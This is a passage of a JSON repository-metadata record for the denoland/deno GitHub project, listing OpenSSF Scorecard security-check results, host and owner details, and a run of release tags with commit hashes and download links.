maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/den